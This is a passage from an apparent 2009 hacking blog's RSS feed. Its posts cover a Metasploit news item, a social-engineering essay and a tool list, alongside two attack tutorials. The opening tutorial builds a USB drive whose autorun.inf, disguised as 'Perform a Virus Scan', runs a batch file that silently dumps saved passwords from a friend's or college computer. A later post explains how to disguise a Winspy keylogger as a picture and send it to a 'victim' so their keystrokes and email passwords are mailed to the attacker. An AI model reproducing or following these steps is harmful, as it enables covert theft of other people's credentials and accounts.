<p style="text-align: justify;">ie: Copy the files &#8211; <strong>mspass.exe</strong>, <strong>mailpv.exe</strong>, <strong>iepv.exe</strong>, <strong>pspv.exe</strong> and <strong>passwordfox.exe</strong> into your USB Drive.</p>
<p style="text-align: justify;"><strong>2.</strong> <strong>Create a new Notepad</strong> and write the following text into it</p>
<blockquote style="text-align: justify;"><p><span style="color: #333333;"><em><strong>[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan</strong></em></span></p></blockquote>
<p style="text-align: justify;"><strong>save</strong> the Notepad as <strong>autorun.inf</strong></p>
<p style="text-align: justify;">Now<strong> copy </strong>the <strong>autorun.inf </strong>file onto your USB pendrive.</p>
<p style="text-align: justify;"><strong>3.</strong> Create another Notepad and write the following text onto it.</p>
<blockquote style="text-align: justify;"><p><em><span style="color: #333333;"><strong>start mspass.exe /stext mspass.txt</strong></span></em></p>
<p><em><span style="color: #333333;"><strong>start mailpv.exe /stext mailpv.txt</strong></span></em></p>
<p><em><span style="color: #333333;"><strong>start iepv.exe /stext iepv.txt</strong></span></em></p>
<p><em><span style="color: #333333;"><strong>start pspv.exe /stext pspv.txt</strong></span></em></p>
<p><em><span style="color: #333333;"><strong>start passwordfox.exe /stext passwordfox.txt</strong></span></em></p></blockquote>
<p style="text-align: justify;">save the Notepad as <em><strong>launch.bat</strong></em></p>
<p style="text-align: justify;"><strong>Copy </strong>the<strong> launch.bat</strong> file also to your USB drive.</p>
<p style="text-align: justify;">Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC  or on your college computer. Just follow these steps</p>
<p style="text-align: justify;">1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).</p>
<p style="text-align: justify;">2. In the pop-up window, select the first option (<span style="color: #333333;"><em><strong>Perform a Virus Scan</strong></em></span>).</p>
<p style="text-align: justify;">3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the<strong> .TXT</strong> files.</p>
<p style="text-align: justify;">4. Remove the pendrive and you’ll see the stored passwords in the <strong>.TXT</strong> files.</p>
<p style="text-align: justify;">This hack works on Windows 2000, XP and Vista.</p>
<p style="text-align: justify;"><strong>Disclaimer:</strong> I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1173&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/12/how-to-hack-passwords-using-a-usb.html/feed</wfw:commentRss>
		<slash:comments>30</slash:comments>
		</item>
		<item>
		<title>Oracle Hacking Tool Released</title>
		<link>http://www.hungry-hackers.com/2009/09/oracle-hacking-tool-released.html</link>
		<comments>http://www.hungry-hackers.com/2009/09/oracle-hacking-tool-released.html#comments</comments>
		<pubDate>Fri, 11 Sep 2009 14:09:02 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking News]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Oracle Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Black Hat]]></category>
		<category><![CDATA[Database]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[Softwares]]></category>
		<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=926</guid>
		<description><![CDATA[Open source security testers have released a free tool that simplifies and automates hacking of Oracle databases at the Black Hat conference in Las Vegas in July 2009.
<br />
The hacking tool was developed in the open source Metasploit cooperative, which had hosted a seminar at the conference.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Open source security testers have released a free tool that simplifies and automates hacking of Oracle databases at the </strong><a href="http://www.blackhat.com/"><strong>Black Hat</strong></a><strong> conference in Las Vegas in July 2009.</strong></p>
<p style="text-align: justify;">The Oracle database is popular with large corporations and governments for recording large volumes of online transactions.</p>
<p style="text-align: justify;">The hacking tool was developed in the open source <a href="http://www.metasploit.com/research/">Metasploit</a> cooperative, which had hosted a seminar at the conference. According to the Metasploit website, students will learn how to create custom modules to solve specific tasks, launch widescale client-side attacks, operate a malicious wireless access point, generate custom backdoors, bypass intrusion prevention systems, and automate the post-exploitation process. The course shows how to use new features in the Metasploit softwre for penetration tests.</p>
<p style="text-align: justify;">In February security researcher and Metasploit co-developer Chris Gates, who runs the <a href="http://www.carnal0wnage.com/">Carnal0wnage</a> website, showed how to attack Oracle using Metasploit. A video of the attack (below) was posted on the Toolbox for IT blogs.</p>
<p align="center"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="248" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=3118559&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="248" src="http://vimeo.com/moogaloop.swf?clip_id=3118559&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><a href="http://vimeo.com/3118559">Attacking Oracle with the Metasploit Framework Shmoocon Firetalk Demo Video</a> from <a href="http://vimeo.com/user959843">carnal0wnage</a> on <a href="http://vimeo.com">Vimeo</a>.
</p>
<p style="text-align: justify;">Reuters reported that Oracle has released a patch that protects against Metasploit. However, many firms are lax about applying patches, opening their information to hackers.</p>
<p style="text-align: justify;">Metasploit has created other tools to hack other software programs, including Microsoft Windows, Apple&#8217;s OSX, Linux and Posix operating systems, as well as the Firefox and Internet Explorer browsers and applications such as Office and Adobe&#8217;s PDF applications.</p>
<p style="text-align: justify;">Meanwhile, Mandiant, another security firm, says it has developed a tool that can detect Metasploit attacks. It says Metasploit&#8217;s Meterpreter software lets developers write code in DLL files and execute everything in memory. This means nothing is written to disk where it might be detected.</p>
<p style="text-align: justify;">Testers and hackers can use Meterpreter to download and upload files, execute code, and open its own command shell. The new tool can tell if Meterpreter is still in memory, and, if so, which files Meterpreter has accessed, and whether it has changed a registry key.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=926&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/09/oracle-hacking-tool-released.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Vulnerabilities That Could Not Be Shielded</title>
		<link>http://www.hungry-hackers.com/2009/08/vulnerabilities-that-could-not-be-shielded.html</link>
		<comments>http://www.hungry-hackers.com/2009/08/vulnerabilities-that-could-not-be-shielded.html#comments</comments>
		<pubDate>Sat, 08 Aug 2009 15:27:44 +0000</pubDate>
		<dc:creator>Amol Wagh</dc:creator>
				<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[application vulnerabilities]]></category>
		<category><![CDATA[emotion]]></category>
		<category><![CDATA[human]]></category>
		<category><![CDATA[physical vulnerability]]></category>
		<category><![CDATA[reaction]]></category>
		<category><![CDATA[vulnerbilities]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/2009/08/vulnerabilities-that-could-not-be-shielded.html</guid>
		<description><![CDATA[The network security administrator should train them for such attacks, show them how to get out of such situation of attacks. give them demonstration, tell them how to react with specific errors, how to react for system crash, tell them how to report a problem, give them a sort of First Aid Kit which can be easily understood &#038; used by all vulnerable human beings in your organization. This is the only way to sheild this vulnerability of emotions.]]></description>
			<content:encoded><![CDATA[<p><strong><em>Vulnerabilities are the drawbacks in the application, network or whole system which allows external attacks to penetrate any network, This is sort of basic definition, any security guy could tell this. </em></strong></p>
<p>My aim is to divert your focus from applications to physical vulnerability.  The most vulnerable element of any system is its user. Its simple to break any one&#8217;s confidence by using his emotions.</p>
<p>Let me explain you with example: Some X person was very rich, confident successful &amp; blah , blah, blah .. One day his child was kidnapped by some criminals &amp; so as to threaten him. He asked police help, takes best in the business to let her child out of those creepy guys.</p>
<p>But why? Because he was scared , that something could happen to his child. His emotions are most vulnerable &amp; that lets his success, confidence &amp; money (we can call it as his shields) broke into pieces.</p>
<p>I am not asking you to kidnap someone, No way. Just telling you which is the vulnerabilities which cant be shielded. Even my emotions are also vulnerable.</p>
<p>Remember, machines can not be threatened, programs could not be vulnerable as  its user is.</p>
<p>Human reacts to things very rapidly if he thinks he is loosing his important thing. He quits thinking &amp; searches for the quickest path to get out &amp; You know what , all you wannabe hackers you have to place your exploit right between that path. He wish to go out, you have to think before he thinks about it. Plan, make a map &amp; and plant.</p>
<p>Are you getting me ? or I am going too fast, Just remember &#8211; You have catch the things this fast to be a great intruder, or what you call it as a HACKER.</p>
<p>To guard against such vulnerabilities all the employees who are working on the network, are suppose to be trained with this thing, that you don&#8217;t have to react quickly.</p>
<p>You the network security administrator should train them for such attacks, show them how to get out of such situation of attacks. give them demonstration, tell them how to react with specific errors, how to react for system crash, tell them how to report a problem, give them a sort of First Aid Kit which can be easily understood &amp; used by all vulnerable human beings in your organization. This is the only way to shield this vulnerability of emotions.</p>
<p>Otherwise this human being have this Emotional vulnerability which is far far beyond the scope of stealth, shield or security. . .</p>
<p><em>This post is made by Amol Wagh who</em><strong> </strong><em>blogs about Ethical Hacking &amp; Exploits on <a title="Hackers Enigma" href="http://www.hackersenigma.com" target="_blank">Hackers Enigma Dot Com</a>. You can<a title="Twitter Updates" href="http://twitter.com/amolwagh" target="_blank"> Follow Amol on Twitter Here.</a></em></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=822&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/08/vulnerabilities-that-could-not-be-shielded.html/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Setting Up A Hackers Workstation</title>
		<link>http://www.hungry-hackers.com/2009/08/setting-up-a-hackers-workstation.html</link>
		<comments>http://www.hungry-hackers.com/2009/08/setting-up-a-hackers-workstation.html#comments</comments>
		<pubDate>Mon, 03 Aug 2009 06:30:10 +0000</pubDate>
		<dc:creator>Amol Wagh</dc:creator>
				<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[hackers tools]]></category>
		<category><![CDATA[hackers workstation]]></category>
		<category><![CDATA[hacking tools collection]]></category>
		<category><![CDATA[network security tools]]></category>
		<category><![CDATA[penetration tests]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=776</guid>
		<description><![CDATA[You're now ready to take on the hacking stuff.  At very beginning you have make your workstation ready, so that things will be available to you at one click.You have to collect some of the tools, Operating System &#38; documentation on your PC with a very clear format.]]></description>
			<content:encoded><![CDATA[<p>Hi guys, Hope you have gone through the<a title="First Step to Hacking" href="http://www.hungry-hackers.com/2009/08/your-first-step-towards-hacking.html" target="_blank"> previous article</a> and you&#8217;re now ready to take on the hacking stuff.  At very beginning you have to make your workstation ready, so that things will be available to you at one click.</p>
<p>You have to collect some of the tools, Operating System &amp; documentation on your PC with a very clear format.</p>
<p><strong>Operating System:</strong></p>
<p>Which OS to use, choice is all yours. Windows in all cases is not so &#8216;made for hacking&#8217; according to me. Whatever XP,Vista or windows 7. They are all just OS which are made for novice public which can learn computers.</p>
<p>If you are a regular Linux user, Then shift to Backtrack Linux. It is Linux made for hacker geeks &amp; completely embedded with all penetration testing tools in it. You can <a title="Backtrack Download" href="http://www.remote-exploit.org/backtrack.html">Download Backtrack here</a>. But if you have never used Linux &amp; wish to learn then you can use basic Linux distributions like <a title="Ubuntu" href="http://www.ubuntu.com/" target="_blank">Ubuntu</a>. But remember that you or not supposed to learn Linux desktop environment like windows, you have to learn its shell or terminal. (command prompt of Linux)</p>
<p>As I said Choice is all yours you can go with Windows also. Its all on you.  (Suggestion: If you can&#8217;t make it habit to learn new things, you can never be a HACKER)</p>
<p><strong>Hackers Toolkit:</strong></p>
<p>In your root directory or C:/ in windows make a folder named Tools. So that you can access all tools from command prompt easily E.g.  c:/tools/example</p>
<p>Go surf for these tools enlisted.</p>
<ul>
<li><a title="Nmap is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts." href="http://www.insecure.org/nmap/nmap_download.html">NMAP : Enumeration</a></li>
<li><a title="The premier Open Source vulnerability assessment tool. Nessus is a remote security scanner for Linux, BSD, Solaris, and other Unix like OS's" href="http://www.nessus.org/">Nessus : </a>Scanning &amp; Enumeration</li>
<li><a title="Ethereal is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk." href="http://www.ethereal.com/">Ethereal </a></li>
<li><a title="Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more" href="http://www.snort.org/">Snort  : </a>Network Hacking</li>
<li><a title="A simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities." href="http://www.atstake.com/research/tools/network_utilities/">Netcat</a></li>
<li><a title="Tcpdump is a well-known and well-loved text-based network packet analyzer. It can be used to print out the headers of packets on a network interface that matches a given expression." href="http://www.tcpdump.org/">TCPDump</a> : For sniffing TCP Packets</li>
<li><a title="Windows port of Tcpdump." href="http://windump.polito.it/">WinDump</a></li>
<li><a title="hping2 assembles and sends custom ICMP/UDP/TCP packets and displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities." href="http://www.hping.org/">Hping2</a></li>
<li><a title="This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI" href="http://naughty.monkey.org/%7Edugsong/dsniff/">DSniff</a> : Sniffing Data Packets</li>
<li><a title="LANguard scans networks and reports information such as service pack level of each machine, missing security patches, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more" href="http://www.gfi.com/lannetscan/">GFI LANguard</a> : LAN Security</li>
<li><a title="Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN." href="http://ettercap.sourceforge.net/">Ettercap</a></li>
<li><a title="Whisker is a scanner which allows you to test HTTP servers for many known security holes, particularly the presence of dangerous CGIs" href="http://www.wiretrip.net/rfp/p/doc.asp?id=21&amp;iface=2">Whisker/Libwhisker</a></li>
<li><a title="John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches." href="http://www.openwall.com/john/">John the Ripper</a> : Password Cracking Utility</li>
<li><a title="A secure way to access remote computers" href="http://www.openssh.com/">OpenSSH</a></li>
<li><a title="SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more" href="http://www.samspade.org/ssw/">Sam Spade</a></li>
<li><a title="Application-level vulnerability assessment. ISS Internet Scanner is pretty good, but is not cheap." href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php">ISS Internet Scanner</a> : Web Server Security</li>
<li><a title="A file and directory integrity checker. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes." href="http://www.tripwire.com/">Tripwire</a></li>
<li><a title="Nikto is a web server scanner which looks for over 2000 potentially dangerous files/CGIs and problems on over 200 servers" href="http://www.cirt.net/code/nikto.shtml">Nikto</a></li>
<li><a title="Kismet is an 802.11b network sniffer and network dissector. It is capable of sniffing using most wireless cards, automatic network IP block detection via UDP, ARP, and DHCP packets, Cisco equipment lists via Cisco Discovery Protocol, weak cryptographic packet logging, and Ethereal and tcpdump compatible packet dump files. It also includes the ability to plot detected networks and estimated network ranges on downloaded maps or user supplied image files." href="http://www.kismetwireless.net/">Kismet</a></li>
<li><a title="A connect-based TCP port scanner, pinger and hostname resolver" href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;subcontent=/resources/proddesc/superscan.htm">SuperScan :</a> Another Great Scanner</li>
<li><a title="Cain &amp; Abel is a free password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary &amp; Brute-Force attacks, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols" href="http://www.oxid.it/cain.html">Cain &amp; Abel </a></li>
<li><a title="SolarWinds has created and sells dozens of special-purpose tools targetted at systems administrators. Security related tools include many network discovery scanners and an SNMP brute-force cracker" href="http://www.solarwinds.net/">SolarWinds Toolsets</a></li>
<li><a title="Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics." href="http://www.ntop.org/">NTop</a></li>
<li><a title="The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts" href="http://www.packetfactory.net/projects/nemesis/">Nemesis</a></li>
<li><a title="Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running certain versions of operating systems. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual machines, or to traceroute them. Any type of service on the virtual machine can be simulated according to a simple configuration file. It is also possible to proxy services to another machine rather than simulating them" href="http://www.citi.umich.edu/u/provos/honeyd/">Honeyd</a></li>
<li><a title="Achilles is a tool designed for testing the security of web applications. Achilles is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Achilles will intercept an HTTP session's data in either direction and give the user the ability to alter the data before transmission. For example, during a normal HTTP SSL connection a typical proxy will relay the session between the server and the client and allow the two end nodes to negotiate SSL. In contrast, when in intercept mode, Achilles will pretend to be the server and negotiate two SSL sessions, one with the client browser and another with the web server. As data is transmitted between the two nodes, Achilles decrypts the data and gives the user the ability to alter and/or log the data in clear text before transmission." href="http://achilles.mavensecurity.com/">Achilles</a></li>
<li><a title="Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. " href="http://www.packetfactory.net/projects/firewalk/">Firewalk</a></li>
<li><a title="Grisofts free virus scanner. A nice antivirus tool" href="http://www.grisoft.com/us/us_dwnl_free.php">AVG Free             Antivirus</a></li>
<li><a title="Trend Micros free online virus scan. Disinfect your computer without having to install a program" href="http://www.trendmicro.com/">Trend Micro online scan</a></li>
<li><a title="Tiny firewall is an excellent product to keep out pesky intruders or to just log activity on your PC." href="http://www.tinysoftware.com/home/tiny2?la=EN">Tiny             Firewall</a></li>
<li><a title="Symantecs virus removal tool library. From blaster to mydoom you can find a tool to remove it here" href="http://securityresponse.symantec.com/avcenter/tools.list.html">Symantec             Virus Tools</a></li>
<li><a title="The Linux Security Auditing Tool (LSAT) is a post install security auditor for Linux/Unix. It checks many system configurations and local network settings on the system for common security/config errors and for packages that are not needed. " href="http://www.linuxsoft.cz/en/redirect.php?id_download=963">Linux             Security Audit Tool</a></li>
<li><a title="Firewall Builder is multi-platform firewall configuration and management tool. It consists of a GUI and set of policy compilers for various firewall platforms. Firewall Builder uses object-oriented approach, it helps administrator maintain a database of network objects and allows policy editing using simple drag-and-drop operations. Firewall Builder currently supports iptables, ipfilter, OpenBSD PF and Cisco PIX. " href="http://www.fwbuilder.org/">Firewall Builder</a></li>
<li><a title="Linux Firewall configurable over web interface. IPCop implements existing technology, secure programming practices and outstanding new concepts to make it ‘the’ Linux Distribution for protecting single home computers, to large corporate networks from intrusions and attacks. Whether for your home, or SOHO, IPCop will scale to fit your needs. IPCop has even been rumoured to be implemented and protecting larger, more complex networks too." href="http://www.ipcop.org/">IPCop</a></li>
<li><a title="Wi-Fi sniffer. It can recognize SSID of card, name of network, packets encrypted by WEP, etc" href="http://airsnort.shmoo.com/">AirSnort</a> : Wireless Network Hacking</li>
<li><a title="SATAN is a tool to help systems administrators. It recognizes several common networking-related security problems, and reports the problems without actually exploiting them." href="http://www.fish.com/satan/">SATAN</a></li>
<li><a title="Rootkit Hunter scans files and systems for known and unknown rootkits, backdoors, and sniffers" href="http://www.rootkit.nl/">Rootkit Hunter : </a>To find out installed root kits<strong>.</strong></li>
<li><a title="Spam Assasin" href="http://www.spamassassin.org/" target="_blank">SpamAssassin</a></li>
<li><a title="grsecurity is a complete security system for Linux 2.4 that implements a detection/prevention/containment strategy. It prevents most forms of address space modification, confines programs via its Role-Based Access Control system, hardens syscalls, provides full-featured auditing, and implements many of the OpenBSD randomness features" href="http://www.grsecurity.net/">grsecurity</a></li>
<li><a title="IPScanner is a tool that is designed for the day-to-day monitoring of computers within Microsoft networking environments. It allows you to gather information from computers in the network without installing server-side applications on these computers. With its powerful engine, this utility can scan hundreds of computers or your entire network ,IP by IP, using different scan types and can help you make " href="http://www.ip-scanner.com/">IP-Scanner</a> : To scan IP Ranges</li>
</ul>
<p>What are these tools ? Why are they used for ? How to use it ? are some of the questions that are striking your head.  Chill all dudes &amp; babes, I am here to help you with each of the tools listed above.  All you have to do is first download them all &amp; place in your root directory.</p>
<p>When ever you are reading things you must have all these tools, So I am giving you the list. And yes, Don&#8217;t forget to <a title="Subscribe to Hacking Truths" href="http://feeds.feedburner.com/hungry-hackers/cafy" target="_blank">Subscribe to Hacking Truths</a>, because you can&#8217;t miss such valuable updates. And yes, don&#8217;t worry about such big list, you won&#8217;t need to use all at a time, they are have wide uses in different fields like &#8211; Cracking, Wireless Networks hacking, Password Hacking, Encryption, Sniffing, Scanning &amp; Enumeration, SQL injection &amp; Web Hacking etc.</p>
<p>So have the tools, and go through their home pages &amp; read as more as you can. For any sort of problems you have, I am just a comment away from you.</p>
<p><em>This post is made by Amol Wagh who</em><strong> </strong><em>blogs about Ethical Hacking &amp; Exploits on <a title="Hackers Enigma" href="http://www.hackersenigma.com" target="_blank">Hackers Enigma Dot Com</a>. You can<a title="Twitter Updates" href="http://twitter.com/amolwagh" target="_blank"> Follow Amol on Twitter Here.</a></em></p>
<p><em><br />
</em></p>
<p><strong> </strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=776&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/08/setting-up-a-hackers-workstation.html/feed</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>Installing a Keylogger on a Remote Machine</title>
		<link>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html</link>
		<comments>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html#comments</comments>
		<pubDate>Tue, 31 Mar 2009 13:03:25 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Back Doors]]></category>
		<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Keyloggers]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Install]]></category>
		<category><![CDATA[Keylogger]]></category>
		<category><![CDATA[Remote]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Triscks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=567</guid>
		<description><![CDATA[Hello friends,

In my previous article "How To Write A Basic Keylogger In VB" I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.]]></description>
			<content:encoded><![CDATA[<p>Hello friends,</p>
<p>In my previous article &#8220;<a rel="bookmark" href="http://www.hungry-hackers.com/2008/05/how-to-write-a-keylogger.html">How To Write A Basic Keylogger In VB</a>&#8221; I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.</p>
<p><em><strong>Note:</strong> This article is for educational purpose only and the author won&#8217;t be responsible for any kind of damage caused by following the information given in this article.</em></p>
<p>Now to install a Keylogger on a Remote Computer you have to follow the steps given below:</p>
<ol>
<li>First of all download Winspy keylogger software from link given below:<br />
<blockquote><p><a title="Winspy Keylogger" href="http://hop.clickbank.net/?hungryhack/bccomp" target="_blank">http://www.win-spy.com/</a></p></blockquote>
</li>
<li>After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.</li>
<li>Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/win-spy-1.jpg"><img class="aligncenter size-full wp-image-571" title="win-spy-1" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/win-spy-1.jpg" alt="win-spy-1" width="407" height="239" /></a></li>
<li>Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-2.jpg"><img class="aligncenter size-full wp-image-572" title="winspy-2" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-2.jpg" alt="winspy-2" width="235" height="145" /></a></li>
<li>Now, Winspy’s main screen will be displayed as shown in image below:<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-3.jpg"><img class="aligncenter size-full wp-image-573" title="winspy-3" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-3.jpg" alt="winspy-3" width="450" height="280" /></a></li>
<li>Select Remote at top, then Remote install.</li>
<li>On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.<a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-4.jpg"><img class="aligncenter size-full wp-image-574" title="winspy-4" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/winspy-4.jpg" alt="winspy-4" width="450" height="300" /></a><br />
<blockquote><p>User &#8211; type in the victim’s name<br />
File name &#8211; Name the file to be sent. Use the name such that victim will love to accept it.<br />
File icon &#8211; Keep it the same<br />
Picture &#8211; select the picture you want to apply to the keylogger.<br />
Email keylog to &#8211; Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.<br />
Thats it. This much is enough. If you want, can change other settings also.</p></blockquote>
</li>
<li><span class="fullpost">After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.</span></li>
</ol>
<p><span class="fullpost">So guys, I hope you have got the trick on how to <strong></strong><strong>hack </strong>any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.</span></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=567&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/03/installing-a-keylogger-on-a-remote-machine.html/feed</wfw:commentRss>
		<slash:comments>45</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1036/1258 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-12 02:10:17 -->
